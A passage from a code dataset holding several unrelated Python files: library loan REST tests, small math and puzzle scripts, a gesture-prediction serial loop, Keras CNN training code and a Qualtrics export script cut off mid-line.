-*-\n#\n# Copyright (C) 2018-2019 CERN.\n# Copyright (C) 2018-2019 RERO.\n#\n# Invenio-Circulation is free software; you can redistribute it and/or modify\n# it under the terms of the MIT License; see LICENSE file for more details.\n\n\"\"\"Tests for loan states.\"\"\"\n\nimport json\n\nfrom flask import url_for\n\nfrom invenio_circulation.pidstore.fetchers import loan_pid_fetcher\nfrom invenio_circulation.proxies import current_circulation\nfrom invenio_circulation.views import build_url_action_for_pid\n\n\ndef test_rest_get_loan(app, json_headers, loan_created):\n \"\"\"Test API GET call to fetch a loan by PID.\"\"\"\n loan_pid = loan_pid_fetcher(loan_created.id, loan_created)\n expected_links = {\n 'actions': {\n 'request': build_url_action_for_pid(loan_pid, 'request'),\n 'checkout': build_url_action_for_pid(loan_pid, 'checkout')\n }\n }\n\n with app.test_client() as client:\n url = url_for('invenio_records_rest.loanid_item',\n pid_value=loan_pid.pid_value)\n res = client.get(url, headers=json_headers)\n\n assert res.status_code == 200\n loan_dict = json.loads(res.data.decode('utf-8'))\n assert loan_dict['metadata']['state'] == loan_created['state']\n assert loan_dict['links'] == expected_links\n\n\ndef _post(app, json_headers, params, pid_value, action):\n \"\"\"Perform API POST with the given param.\"\"\"\n with app.test_client() as client:\n url = url_for('invenio_circulation_loan_actions.loanid_actions',\n pid_value=pid_value, action=action)\n res = client.post(url, headers=json_headers, data=json.dumps(params))\n payload = json.loads(res.data.decode('utf-8'))\n return res, payload\n\n\ndef test_rest_explicit_loan_valid_action(\n app, json_headers, params, loan_created\n):\n \"\"\"Test API valid action on loan.\"\"\"\n loan_pid = loan_pid_fetcher(loan_created.id, loan_created)\n\n res, payload = _post(app, json_headers, params,\n pid_value=loan_pid.pid_value, action='checkout')\n assert res.status_code == 202\n assert payload['metadata']['state'] == 'ITEM_ON_LOAN'\n\n\ndef test_rest_automatic_loan_valid_action(\n app, json_headers, params, loan_created\n):\n \"\"\"Test API valid action on loan.\"\"\"\n loan = current_circulation.circulation.trigger(\n loan_created,\n **dict(params, trigger='request',\n pickup_location_pid='pickup_location_pid')\n )\n assert loan['state'] == 'PENDING'\n\n app.config[\n 'CIRCULATION_ITEM_LOCATION_RETRIEVER'\n ] = lambda x: 'pickup_location_pid'\n\n loan_pid = loan_pid_fetcher(loan.id, loan)\n\n res, payload = _post(app, json_headers, params,\n pid_value=loan_pid.pid_value, action='next')\n assert res.status_code == 202\n assert payload['metadata']['state'] == 'ITEM_AT_DESK'\n\n\ndef test_rest_loan_invalid_action(\n app, json_headers, params, loan_created\n):\n \"\"\"Test API invalid action on loan.\"\"\"\n loan = current_circulation.circulation.trigger(\n loan_created,\n **dict(params, trigger='request',\n pickup_location_pid='pickup_location_pid')\n )\n assert loan['state'] == 'PENDING'\n\n loan_pid = loan_pid_fetcher(loan.id, loan)\n\n res, payload = _post(app, json_headers, params,\n pid_value=loan_pid.pid_value, action='extend')\n assert res.status_code == 400\n assert 'message' in payload\n","sub_path":"tests/test_rest_loan_item.py","file_name":"test_rest_loan_item.py","file_ext":"py","file_size_in_byte":3435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"445602808","text":"###\n# make_bitcount_header.py\n#\n# Creates a C++ header file bitcount.h\n# This header defines the array BITCOUNT,\n# which includes the number of bits set\n# for the bitmasks represented by 0..511\n###\n\n# Number of bits (for Sudoku: 9)\nN_BITS = 9\n\n# Array of powers of two\nPOWERS_OF_TWO = [2**n for n in reversed(range(N_BITS))]\n\n\ndef make_bitcount_dict():\n return {bitmask: bin(bitmask).count('1') for bitmask in range(2**N_BITS)}\n\n\ndef make_bitcount_list():\n return [bin(bitmask).count('1') for bitmask in range(2**N_BITS)]\n\n\ndef make_header_file():\n filelines = []\n filelines.append(\"/*****************************************\\n\")\n filelines.append(\" * bitcount.h\\n\")\n filelines.append(\" * \\n\")\n filelines.append(\" * Generated by make_bitcount_header.py\\n\")\n filelines.append(\" * This header defines the array BITCOUNT,\\n\")\n filelines.append(\" * which includes the number of bits set\\n\")\n filelines.append(\" * for the bitmasks represented by 0..511\\n\")\n filelines.append(\" ****************************************/\\n\")\n\n list_str = repr(make_bitcount_list()).strip('[]')\n filelines.append(\"const int BITCOUNT[] = {%s};\\n\\n\" % list_str)\n\n with open('bitcount.h', 'w') as headerfile:\n headerfile.writelines(filelines)\n\n return 0\n\nif __name__ == '__main__':\n make_header_file()\n","sub_path":"make_bitcount_header.py","file_name":"make_bitcount_header.py","file_ext":"py","file_size_in_byte":1329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"390745243","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jul 19 11:18:18 2015\n\n@author: willy\n\"\"\"\n\nimport numpy as np\n\ndef naive_ffmethod(n):\n \"\"\"\n Naive Fermat's Factorization method.\n Takes an integer n and return two factor in a tuple (c, d).\n If n is prime, then return (n, 1)\n \"\"\"\n # The method is valid only if n is odd\n # Check if n is odd\n if n%2==0:\n return ((n/2, 2) if n>2 else (2, 1))\n \n factors = (n, 1)\n start = int(np.trunc(np.sqrt(n)) + 1)\n end = int(np.true_divide(n+1, 2) + 1)\n a = start\n while a < end:\n b_square = a**2 - n\n b = np.sqrt(b_square)\n if np.trunc(b) == b: # If b is a perfect square\n return (int(a+b), int(a-b))\n a+=1\n return factors\n \nif __name__ == \"__main__\":\n f_in = open('./input.txt', 'r')\n f_out = open('./output.txt', 'w')\n #lines = f_in.readlines()\n n = f_in.readline()\n while n != '':\n factors = naive_ffmethod(int(n))\n f_out.write(\"{}; {}\\n\".format(factors[0], factors[1]))\n n = f_in.readline()\n f_in.close()\n f_out.close()\n","sub_path":"naiveffm.py","file_name":"naiveffm.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"395807259","text":"\"\"\"\nYou are given an array and you need to find number of tripets of indices (i,j,k) such that the elements at those\nindices are in geometric progression for a given common ratio r and i {posibilities}')\n\n return triplets\n","sub_path":"Hash/triplets.py","file_name":"triplets.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"622937960","text":"# Predict_Gesture.py\n# Description: Recieved Data from ESP32 Micro via the AGRB-Training-Data-Capture.ino file, make gesture prediction \n# Written by: Nate Damen\n# Created on July 13th 2020\n\nimport numpy as np \nimport pandas as pd \nimport datetime\nimport re\nimport os, os.path\nimport time\nimport random\nimport tensorflow as tf\nimport serial\n\nPORT = \"/dev/ttyUSB0\"\n#PORT = \"/dev/ttyUSB1\"\n#PORT = \"COM8\"\n\nserialport = None\nserialport = serial.Serial(PORT, 115200, timeout=0.05)\n\n#load Model\nmodel = tf.keras.models.load_model('../Model/cnn_model.h5')\n\n#Get Data from imu. Waits for incomming data and data stop\ndef get_imu_data():\n global serialport\n if not serialport:\n # open serial port\n serialport = serial.Serial(PORT, 115200, timeout=0.05)\n # check which port was really used\n print(\"Opened\", serialport.name)\n # Flush input\n time.sleep(3)\n serialport.readline()\n\n # Poll the serial port\n line = str(serialport.readline(),'utf-8')\n if not line:\n return None\n #print(line)\n #if not \"Uni:\" in line:\n #return None\n vals = line.replace(\"Uni:\", \"\").strip().split(',')\n #print(vals)\n if len(vals) != 7:\n return None\n try:\n vals = [float(i) for i in vals]\n except ValueError:\n return ValueError\n #print(vals)\n return vals\n\n# Create Reshape function for each row of the dataset\ndef reshape_function(data):\n reshaped_data = tf.reshape(data, [-1, 3, 1])\n return reshaped_data\n\n# header for the incomming data\nheader = [\"deltaTime\",\"Acc_X\",\"Acc_Y\",\"Acc_Z\",\"Gyro_X\",\"Gyro_Y\",\"Gyro_Z\"]\n\n#Create a way to see the length of the data incomming, needs to be 760 points. Used for testing incomming data\ndef dataFrameLenTest(data):\n df=pd.DataFrame(data,columns=header)\n x=len(df[['Acc_X','Acc_Y','Acc_Z']].to_numpy())\n print(x)\n return x\n\n#Create a pipeline to process incomming data for the model to read and handle\ndef data_pipeline(data_a):\n df = pd.DataFrame(data_a, columns = header)\n temp=df[['Acc_X','Acc_Y','Acc_Z']].to_numpy()\n tensor_set = tf.data.Dataset.from_tensor_slices(\n (np.array([temp.tolist()],dtype=np.float64)))\n tensor_set_cnn = tensor_set.map(reshape_function)\n tensor_set_cnn = tensor_set_cnn.batch(192)\n return tensor_set_cnn\n\n#define Gestures, current data, temp data holder, a first cylce boolean,\ngest_id = {0:'single_wave', 1:'fist_pump', 2:'random_motion', 3:'speed_mode'}\ndata = []\ndataholder=[]\ndataCollecting = False\ngesture = ''\nold_gesture = ''\n\n#flush the serial port\nserialport.flush()\n\nwhile(1):\n dataholder = get_imu_data()\n if dataholder != None:\n dataCollecting=True\n data.append(dataholder)\n if dataholder == None and dataCollecting == True:\n if len(data) == 760:\n prediction = np.argmax(model.predict(data_pipeline(data)), axis=1)\n gesture=gest_id[prediction[0]]\n print(gesture)\n data = []\n dataCollecting = False\n old_gesture=gesture\n","sub_path":"Python_Scripts/Predict_Gesture.py","file_name":"Predict_Gesture.py","file_ext":"py","file_size_in_byte":3018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"343706591","text":"'''\nMandrescu Mihai Petru - 342\n20.04.2015\n'''\n#Libraries\nfrom gmpy2 import mpfr as largeNumber\nfrom gmpy2 import sqrt as squareRoot\nfrom time import time as currentTime\nimport gmpy2\ngmpy2.get_context().precision=2500\n\n#Definitions\nFACTORS = 0\nTIME = 1\nA = 2\nX = 3\nP = 0\nQ = 1\nLARGE_PRIME_FILE = \"largePrime.txt\"\n\n#Class\nclass Factor:\n def __init__(self,N):\n self.N = N\n self.result = self.factor(N)\n self.factors = self.result[FACTORS]\n self.requiredTime = self.result[TIME]\n self.A = self.result[A]\n self.x = self.result[X]\n self.p = self.factors[P]\n self.q = self.factors[Q]\n def assign(self,p,q,A,x,startTime,endTime):\n return ((p,q),endTime-startTime,A,x)\n def factor(self,N):\n startTime = currentTime()\n possibleA = largeNumber(squareRoot(N))\n condition = True\n iteration = 0\n while condition:\n x = largeNumber(squareRoot(possibleA**2 - N))\n possibleP = possibleA - x\n possibleQ = possibleA + x\n\n #Debug\n print(\"---\")\n print(\"Iteration:\",iteration)\n print(\"possibleA:\",str(possibleA))\n print(\"x:\",x)\n print(\"possibleP:\",str(possibleP))\n print(\"possibleQ:\",str(possibleQ))\n print(\"Match:\",str(largeNumber(possibleP*possibleQ)),\"out of\",N,\" --- Approximately\",( largeNumber(largeNumber(possibleP*possibleQ)/N) )*100,\"%\")\n print(\"---\")\n\n if possibleP*possibleQ == N:\n endTime = currentTime()\n condition = False\n return self.assign(possibleP,possibleQ,possibleA,x,startTime,endTime)\n else:\n possibleA += 1\n iteration += 1\n def display(self):\n print(\"=====\")\n print(\"Factoring duration:\",self.requiredTime)\n print(\"Large number to factor:\",str(self.N))\n print(\"Factor p =\",str(self.p))\n print(\"Factor q =\",str(self.q))\n print(\"Found A =\",str(self.A))\n print(\"Found x =\",str(self.x))\n print(\"=====\")\n\n#Functions\ndef readLargePrime(path):\n largeNumberString = str((open(path,'rb').read()[:-2]).decode('utf-8'))\n return largeNumber(largeNumberString)\ndef main():\n factor = Factor(readLargePrime(LARGE_PRIME_FILE))\n factor.display()\nif __name__ == \"__main__\":\n main()\n","sub_path":"Crypto/HomeWork2/largePrimeFactoring.py","file_name":"largePrimeFactoring.py","file_ext":"py","file_size_in_byte":2375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"596950996","text":"import os\n\ndef MultiIsoforms(inF):\n D = {}\n inFile = open(inF)\n for line in inFile:\n line = line.strip()\n fields = line.split('\\t')\n geneID = fields[0]\n D.setdefault(geneID, [])\n D[geneID].append(line)\n inFile.close()\n\n Fs = [x for x in os.listdir('.') if x.endswith('.txt') and x.find('Homo_sapiens.GRCh38.97_GeneRegionType_') == 0 and x.find('Multi') == -1]\n for F in Fs:\n inFile = open(F)\n ouFile = open(F.split('.txt')[0] + '_MultiTx.txt', 'w')\n ouFile2 = open(F.split('.txt')[0] + '_MultiEx.txt', 'w')\n ouFile3 = open(F.split('.txt')[0] + '_TwoEx.txt', 'w')\n ouFile4 = open(F.split('.txt')[0] + '_OneEx.txt', 'w')\n for line in inFile:\n line = line.strip()\n fields = line.split('\\t')\n geneID = fields[0]\n if geneID in D:\n if len(D[geneID]) > 1:\n ouFile.write(line + '\\t' + str(len(D[geneID])) + '\\t' + '\\t'.join(D[geneID]) + '\\n')\n else:\n ex = D[geneID][0].split('\\t')\n if len(ex) > 18:\n ouFile2.write(line + '\\t' + str((len(ex) - 10)/4) + '\\t' + '\\t'.join(D[geneID]) + '\\n')\n elif len(ex) > 14:\n ouFile3.write(line + '\\t' + str((len(ex) - 10)/4) + '\\t' + '\\t'.join(D[geneID]) + '\\n')\n else:\n ouFile4.write(line + '\\t' + str((len(ex) - 10)/4) + '\\t' + '\\t'.join(D[geneID]) + '\\n')\n inFile.close()\n ouFile.close()\n ouFile2.close()\n ouFile3.close()\n\nMultiIsoforms('Homo_sapiens.GRCh38.97_GeneTranscriptExonPos')\n","sub_path":"Data/Ensembl/TCRsBCRsMHCs/05-MultiIsoforms.py","file_name":"05-MultiIsoforms.py","file_ext":"py","file_size_in_byte":1675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"588735465","text":"def checkio(portions):\n fed_pigeons = 0\n minute = 1\n while True:\n for i in range(fed_pigeons):\n portions -= 1\n if portions <= 0:\n return fed_pigeons\n for i in range(minute):\n portions -= 1\n fed_pigeons += 1\n if portions <= 0:\n return fed_pigeons\n minute += 1\nif __name__ == '__main__':\n #These \"asserts\" using only for self-checking and not necessary for auto-testing\n assert checkio(1) == 1, \"1st example\"\n assert checkio(2) == 1, \"2nd example\"\n assert checkio(5) == 3, \"3rd example\"\n assert checkio(10) == 6, \"4th example\"","sub_path":"00_home/Feed Pigeons.py","file_name":"Feed Pigeons.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"642637411","text":"# Construindo exemplos simples com a funão input()\n\n# Até o momento, utilizamos a função normal para estar realziando exeibições simples\n# no console da IDE, conforme o exemplo abaixo:\n\nnome01 = \"Gabriel Galúcio\"\nidade01 = 21\nprint(\"Seu nome é: \", nome01, \"e sua idade é: \", idade01)\n\n# O input nos permite entrar com um dado no console:\n# input()\n\n# O input sempre retorna um STRING\n\"\"\"\nx = input()\ny = input()\nprint(\"O Valor de x é: \", x)\nprint(\"O valor de y é: \", y)\n\"\"\"\n\n# Então teremos de converter o input para manipular inteiros ou floats\na = int(input(\"Digite aqui o primeiro número: \"))\nb = int(input(\"Digite aqui o segundo número: \"))\nnome = input(\"DIgite aqui o nome da pessoa:\" )\nprint(\"O primeiro número é: \",a,\"o segundo número é: \",b,\"seu nome é: \",nome)\n\n\n\n","sub_path":"Py_LV01/014_funcao_input.py","file_name":"014_funcao_input.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"528968215","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Mar 02 15:59:36 2017\n\n@author: Thomas Kuestner\n\"\"\"\nimport os.path \nimport scipy.io as sio \nimport numpy as np # for algebraic operations, matrices\nimport keras\nimport keras.optimizers\nfrom keras.models import Sequential, Model\nfrom keras.layers import Input\nfrom keras.layers.core import Dense, Activation, Flatten, Dropout, Lambda, Reshape\nfrom keras.activations import relu, elu, softmax\nfrom keras.layers.advanced_activations import LeakyReLU, PReLU\nfrom keras.initializers import Constant\nfrom keras.layers import concatenate, add\nfrom keras.layers.convolutional import Conv3D,Conv2D, MaxPooling3D, MaxPooling2D, ZeroPadding3D\nfrom keras.regularizers import l1_l2,l2\nfrom keras.models import model_from_json\nfrom keras.callbacks import EarlyStopping, ModelCheckpoint,ReduceLROnPlateau\n\ndef createModel(patchSize, architecture='new'):\n if architecture == 'new':\n l1_reg = 0\n l2_reg = 1e-6\n cnn = Sequential()\n # Total params: 272,994\n cnn.add(Conv2D(32,\n kernel_size=(14, 14),\n kernel_initializer='he_normal',\n weights=None,\n padding='valid',\n strides=(1, 1),\n kernel_regularizer=l1_l2(l1_reg, l2_reg),\n input_shape=(1, int(patchSize[0]), int(patchSize[0]))))\n # input shape : 1 means grayscale... richtig uebergeben...\n cnn.add(Activation('relu'))\n\n cnn.add(Conv2D(64, # learning rate: 0.1 -> 76%\n kernel_size=(7, 7),\n kernel_initializer='he_normal',\n weights=None,\n padding='valid',\n strides=(1, 1),\n kernel_regularizer=l1_l2(l1_reg, l2_reg),\n # data_format='channels_first'\n ))\n cnn.add(Activation('relu'))\n cnn.add(Conv2D(128, # learning rate: 0.1 -> 76%\n kernel_size=(3, 3),\n kernel_initializer='he_normal',\n weights=None,\n padding='valid',\n strides=(1, 1),\n kernel_regularizer=l1_l2(l1_reg, l2_reg)))\n cnn.add(Activation('relu'))\n cnn.add(Flatten())\n cnn.add(Dense(units=2,\n kernel_initializer='he_normal',\n kernel_regularizer='l2'))\n cnn.add(Activation('softmax'))\n\n elif architecture == 'old':\n cnn = Sequential()\n cnn.add(Convolution2D(32,\n 14,\n 14,\n init='he_normal',\n # activation='sigmoid',\n weights=None,\n border_mode='valid',\n subsample=(1, 1),\n W_regularizer=l2(1e-6),\n input_shape=(1, patchSize[0,0], patchSize[0,1])))\n cnn.add(Activation('relu'))\n\n # cnn.add(Convolution2D(32,\n # 7,\n # 7,\n # init='normal',\n # # activation='sigmoid',\n # weights=None,\n # border_mode='valid',\n # subsample=(1, 1),\n # W_regularizer=l2(1e-6)))\n # #input_shape=(1, patchSize[0,0], patchSize[0,1])))\n # cnn.add(Activation('relu'))\n cnn.add(Convolution2D(64 , #learning rate: 0.1 -> 76%\n 7,\n 7,\n init='he_normal',\n # activation='sigmoid',\n weights=None,\n border_mode='valid',\n subsample=(1, 1),\n W_regularizer=l2(1e-6)))\n cnn.add(Activation('relu'))\n\n cnn.add(Convolution2D(128 , #learning rate: 0.1 -> 76%\n 3,\n 3,\n init='he_normal',\n # activation='sigmoid',\n weights=None,\n border_mode='valid',\n subsample=(1, 1),\n W_regularizer=l2(1e-6)))\n cnn.add(Activation('relu'))\n\n #cnn.add(pool2(pool_size=(2, 2), strides=None, border_mode='valid', dim_ordering='th'))\n\n cnn.add(Flatten())\n #cnn.add(Dense(input_dim= 100,\n # output_dim= 100,\n # init = 'normal',\n # #activation = 'sigmoid',\n # W_regularizer='l2'))\n #cnn.add(Activation('sigmoid'))\n cnn.add(Dense(output_dim= 2,\n init = 'normal',\n #activation = 'sigmoid',\n W_regularizer='l2'))\n cnn.add(Activation('softmax'))\n\n return cnn\n\ndef fTrain(X_train, y_train, X_test, y_test, sOutPath, patchSize, batchSizes=None, learningRates=None, iEpochs=None, CV_Patient=0):\n # grid search on batch_sizes and learning rates\n # parse inputs\n batchSizes = [64] if batchSizes is None else batchSizes\n learningRates = [0.01] if learningRates is None else learningRates\n iEpochs = 300 if iEpochs is None else iEpochs\n\t\n\t# change the shape of the dataset\n X_train = np.expand_dims(X_train, axis=1)\n X_test = np.expand_dims(X_test, axis=1)\n y_train = np.asarray([y_train[:], np.abs(np.asarray(y_train[:], dtype=np.float32)-1)]).T\n y_test = np.asarray([y_test[:], np.abs(np.asarray(y_test[:], dtype=np.float32)-1)]).T\n\n for iBatch in batchSizes:\n for iLearn in learningRates:\n fTrainInner(X_train, y_train, X_test, y_test, sOutPath, patchSize, iBatch, iLearn, iEpochs, CV_Patient=CV_Patient)\n\ndef fTrainInner(X_train, y_train, X_test, y_test, sOutPath, patchSize, batchSize=None, learningRate=None, iEpochs=None, CV_Patient=0):\n # parse inputs\n batchSize = [64] if batchSize is None else batchSize\n learningRate = [0.01] if learningRate is None else learningRate\n iEpochs = 300 if iEpochs is None else iEpochs\n \n print('Training 2D CNN')\n print('with lr = ' + str(learningRate) + ' , batchSize = ' + str(batchSize))\n \n # save names\n _, sPath = os.path.splitdrive(sOutPath)\n sPath,sFilename = os.path.split(sPath)\n sFilename, sExt = os.path.splitext(sFilename)\n model_name = sPath + '/' + sFilename + '/' + sFilename +'_lr_' + str(learningRate) + '_bs_' + str(batchSize)\n if CV_Patient != 0: model_name = model_name + '_' + 'CV' + str(CV_Patient) # determine if crossValPatient is used...\n weight_name = model_name + '_weights.h5'\n model_json = model_name + '_json'\n model_all = model_name + '_model.h5' \n model_mat = model_name + '.mat' \n \n if(os.path.isfile(model_mat)): # no training if output file exists\n return\n \n # create model\n cnn = createModel(patchSize)\n \n #opti = SGD(lr=learningRate, momentum=1e-8, decay=0.1, nesterov=True);#Adag(lr=0.01, epsilon=1e-06)\n opti = keras.optimizers.Adam(lr=learningRate, beta_1=0.9, beta_2=0.999, epsilon=1e-08, decay=0.0)\n callbacks = [EarlyStopping(monitor='val_loss',patience=5,verbose=1)]\n #callbacks.append(\n # ModelCheckpoint('/home/sXXXX/no_backup/sXXXX/checkpoints/checker.hdf5', monitor='val_acc', verbose=0,\n # period=5, save_best_only=True)) # overrides the last checkpoint, its just for security\n #callbacks.append(ReduceLROnPlateau(monitor='loss', factor=0.5, patience=5, min_lr=1e-4, verbose=1))\n\t\t\n cnn.compile(loss='categorical_crossentropy', optimizer=opti, metrics=['accuracy'])\n print(cnn.summary)\n\n result = cnn.fit(X_train,\n y_train,\n validation_data=[X_test, y_test],\n nb_epoch=iEpochs,\n batch_size=batchSize, \n callbacks=callbacks,\n verbose=1)\n \n loss_test, acc_test = cnn.evaluate(X_test, y_test,batch_size=batchSize)\n \t\t\n prob_test = cnn.predict(X_test, batchSize, 0)\n \n # save model\n json_string = cnn.to_json()\n open(model_json, 'w').write(json_string)\n #wei = cnn.get_weights()\n cnn.save_weights(weight_name, overwrite=True)\n #cnn.save(model_all) # keras > v0.7\n \n #matlab\n acc = result.history['acc']\n loss = result.history['loss']\n val_acc = result.history['val_acc']\n val_loss = result.history['val_loss']\n \n print('Saving results: ' + model_name)\n sio.savemat(model_name,{'model_settings':model_json,\n 'model':model_all,\n 'weights':weight_name,\n 'acc':acc,\n 'loss':loss,\n 'val_acc':val_acc,\n 'val_loss':val_loss,\n 'loss_test':loss_test,\n 'acc_test':acc_test,\n 'prob_test':prob_test})\n\ndef fPredict(X_test, y_test, model_name, sOutPath, patchSize, batchSize):\n\n weight_name = sOutPath + '/' + model_name + '_weights.h5'\n model_json = sOutPath + model_name + '_json'\n model_all = sOutPath + model_name + '_model.h5'\n\n# # load weights and model (OLD WAY)\n# conten = sio.loadmat(model_name)\n# weig = content['wei']\n# nSize = weig.shape\n# weigh = []\n# \n# for i in drange(0,nSize[1],2):\n# \tw0 = weig[0,i]\n# \tw1 = weig[0,i+1]\n# \tw1=w1.T\n# \tw1 = np.concatenate(w1,axis=0)\n# \t\n# \tweigh= weigh.extend([w0, w1])\n# \t\n# model = model_from_json(model_json)\n# model.set_weights(weigh)\n \n # load weights and model (new way)\n #model = model_from_json(model_json)\n model = createModel(patchSize)\n opti = keras.optimizers.Adam(lr=0.0001, beta_1=0.9, beta_2=0.999, epsilon=1e-08, decay=0.0)\n callbacks = [EarlyStopping(monitor='val_loss',patience=10,verbose=1)] \n \n model.compile(loss='categorical_crossentropy', optimizer=opti, metrics=['accuracy'])\n model.load_weights(weight_name)\n\n # load complete model (including weights); keras > 0.7\n #model = load_model(model_all)\n\t\n # assume artifact affected shall be tested!\n #y_test = np.ones((len(X_test),1))\n\n X_test = np.expand_dims(X_test, axis=1)\n y_test = np.asarray([y_test[:], np.abs(np.asarray(y_test[:], dtype=np.float32) - 1)]).T\n\n score_test, acc_test = model.evaluate(X_test, y_test, batch_size=batchSize)\n prob_pre = model.predict(X_test, batchSize, 1)\n \n #modelSave = model_name[:-5] + '_pred.mat'\n modelSave = sOutPath + '/' + model_name + '_pred.mat'\n sio.savemat(modelSave, {'prob_pre':prob_pre, 'score_test': score_test, 'acc_test':acc_test})\n model.save(model_all)\n \n###############################################################################\n## OPTIMIZATIONS ##\n###############################################################################\ndef fHyperasTrain(X_train, Y_train, X_test, Y_test, patchSize):\n # explicitly stated here instead of cnn = createModel() to allow optimization\n cnn = Sequential()\n# cnn.add(Convolution2D(32,\n# 14, \n# 14, \n# init='normal',\n# # activation='sigmoid',\n# weights=None,\n# border_mode='valid',\n# subsample=(1, 1),\n# W_regularizer=l2(1e-6),\n# input_shape=(1, patchSize[0,0], patchSize[0,1])))\n# cnn.add(Activation('relu'))\n \n cnn.add(Convolution2D(32, #64\n 7,\n 7,\n init='normal',\n # activation='sigmoid',\n weights=None,\n border_mode='valid',\n subsample=(1, 1),\n W_regularizer=l2(1e-6)))\n cnn.add(Activation('relu')) \n cnn.add(Convolution2D(64 , #learning rate: 0.1 -> 76%\n 3, \n 3, \n init='normal',\n # activation='sigmoid',\n weights=None,\n border_mode='valid',\n subsample=(1, 1),\n W_regularizer=l2(1e-6)))\n cnn.add(Activation('relu'))\n \n cnn.add(Convolution2D(128 , #learning rate: 0.1 -> 76%\n 3, \n 3, \n init='normal',\n # activation='sigmoid',\n weights=None,\n border_mode='valid',\n subsample=(1, 1),\n W_regularizer=l2(1e-6)))\n cnn.add(Activation('relu'))\n \n #cnn.add(pool2(pool_size=(2, 2), strides=None, border_mode='valid', dim_ordering='th'))\n \n cnn.add(Flatten())\n #cnn.add(Dense(input_dim= 100,\n # output_dim= 100,\n # init = 'normal',\n # #activation = 'sigmoid',\n # W_regularizer='l2'))\n #cnn.add(Activation('sigmoid'))\n cnn.add(Dense(input_dim= 100,\n output_dim= 2,\n init = 'normal',\n #activation = 'sigmoid',\n W_regularizer='l2'))\n cnn.add(Activation('softmax'))\n \n opti = SGD(lr={{choice([0.1, 0.01, 0.05, 0.005, 0.001])}}, momentum=1e-8, decay=0.1, nesterov=True)\n cnn.compile(loss='categorical_crossentropy', \n optimizer=opti)\n \n epochs = 300\n \n result = cnn.fit(X_train, Y_train,\n batch_size=128, # {{choice([64, 128])}}\n nb_epoch=epochs,\n show_accuracy=True,\n verbose=2,\n validation_data=(X_test, Y_test))\n score_test, acc_test = cnn.evaluate(X_test, Y_test, verbose=0)\n \n return {'loss': -acc_test, 'status': STATUS_OK, 'model': cnn, 'trainresult': result, 'score_test': score_test}\n\n \n## helper functions \ndef drange(start, stop, step):\n r = start\n while r < stop:\n yield r\n r += step\n","sub_path":"networks/motion/CNN2D/motion_all_CNN2D.py","file_name":"motion_all_CNN2D.py","file_ext":"py","file_size_in_byte":14780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"287532619","text":"# Python 3\nfrom __future__ import print_function\nfrom sys import argv\nfrom httplib2 import Http\nfrom oauth2client import file, client, tools\nfrom googleapiclient.discovery import build\nimport requests\nimport zipfile\nimport json\nimport io, os\nimport csv\nimport re\n\n# Setting user Parameters\ndef main(survey, sid, api_key):\n\ttry:\n\t\tapiToken = api_key\n\texcept KeyError:\n\t\tprint(\"set environment variable X_API_TOKEN\")\n\t\tsys.exit(2) \n\n\n\tsurvey_ids = {\n\t\tsurvey: sid\n\t}\n\n\tfor survey_name in survey_ids:\n\n\t\tsurveyId = survey_ids[survey_name]\n\t\tfileFormat = \"csv\"\n\t\tdataCenter = \"harvard.az1\"\n\n\t\t# Setting static parameters\n\t\trequestCheckProgress = 0.0\n\t\tprogressStatus = \"inProgress\"\n\t\tbaseUrl = \"https://{0}.qualtrics.com/API/v3/surveys/{1}/export-responses/\".format(dataCenter, surveyId)\n\t\theaders = {\n\t\t\t\"content-type\": \"application/json\",\n\t\t\t\"x-api-token\": apiToken,\n\t\t\t}\n\n\t\t# Step 1: Creating Data Export\n\t\tdownloadRequestUrl = baseUrl\n\t\tdownloadRequestPayload = '{\"format\":\"' + fileFormat + '\",\"useLabels\":\"true\"}'\n\t\tdownloadRequestResponse = requests.request(\"POST\", downloadRequestUrl, data=downloadRequestPayload, headers=headers)\n\t\tprogressId = downloadRequestResponse.json()[\"result\"][\"progressId\"]\n\t\tprint(downloadRequestResponse.text)\n\n\t\t# Step 2: Checking on Data Export Progress and waiting until export is ready\n\t\twhile progressStatus != \"complete\" and progressStatus != \"failed\":\n\t\t\tprint (\"progressStatus=\", progressStatus)\n\t\t\trequestCheckUrl = baseUrl + progressId\n\t\t\trequestCheckResponse = requests.request(\"GET\", requestCheckUrl, headers=headers)\n\t\t\trequestCheckProgress = requestCheckResponse.json()[\"result\"][\"percentComplete\"]\n\t\t\tprint(\"Download is \" + str(requestCheckProgress) + \" complete\")\n\t\t\tprogressStatus = requestCheckResponse.json()[\"result\"][\"status\"]\n\n\t\t#step 2.1: Check for error\n\t\tif progressStatus is \"failed\":\n\t\t\traise Exception(\"export failed\")\n\n\t\tfileId = requestCheckResponse.json()[\"result\"][\"fileId\"]\n\n\t\t# Step 3: Downloading file\n\t\trequestDownloadUrl = baseUrl + fileId + '/file'\n\t\trequestDownload = requests.request(\"GET\", requestDownloadUrl, headers=headers, stream=True)\n\n\t\t# Step 4: Unzipping the file\n\t\tfile = zipfile.ZipFile(io.BytesIO(requestDownload.content))\n\t\tfile.extractall(survey_name)\n\n\t\tfile_name = file.namelist()[0]\n\t\tcsv_path = r'' + survey_name + '/' + file_name + ''\n\n\t\t# Step 5: put all values from CSV into a list so we can loop through for normalization\n\t\tvalues = []\n\n\t\t#replace test with csv_path when you're ready\n\t\twith open(csv_path, 'r', newline='') as raw_file:\n\t\t\treader = csv.reader(raw_file)\n\t\t\tfor row in 